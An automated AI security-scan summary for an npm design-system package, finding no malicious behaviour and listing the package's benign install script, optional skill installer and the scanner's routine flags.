AI Security Review
scanned 5d ago · by lpm-firewall-aiNo confirmed malicious attack surface was found. Install-time behavior is limited to a guarded welcome banner and version sentinel; optional agent skill installation is explicit user action.
Decision evidence
public snapshot- package.json defines postinstall: node scripts/welcome.mjs || true
- scripts/welcome.mjs writes a benign sentinel node_modules/.shilp-sutra-welcomed during eligible TTY installs
- skill/install.sh can overwrite an agent skill directory, but only when a user explicitly runs the installer
- scripts/welcome.mjs only reads package.json/env/TTY state, prints setup text, and records the current version sentinel
- postinstall has no network calls, child_process use, credential access, shell execution, or agent config writes
- AGENTS.md and skill/SKILL.md are package-aligned design-system usage instructions, not hidden lifecycle mutation
- skill/install.sh network access targets the package's GitHub repo and is documented/user-invoked, not run by npm install
- dist/ui/index.js is a React component barrel with a browser-only CSS-token warning and no exfiltration behavior
- bundled woff2 fonts are expected design-system assets
Source & flagged code
5 flagged · loading sourcePackage defines install-time lifecycle scripts.
package.jsonView on unpkgInstall-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgInstall-time source drops package-supplied AI-agent/MCP control files or instructions.
scripts/welcome.mjsView on unpkg · L4Package ships non-JavaScript build or shell helper files.
skill/install.shView on unpkgPackage ships high-entropy non-source blobs.
fonts/Inter-Italic-Variable.woff2View on unpkg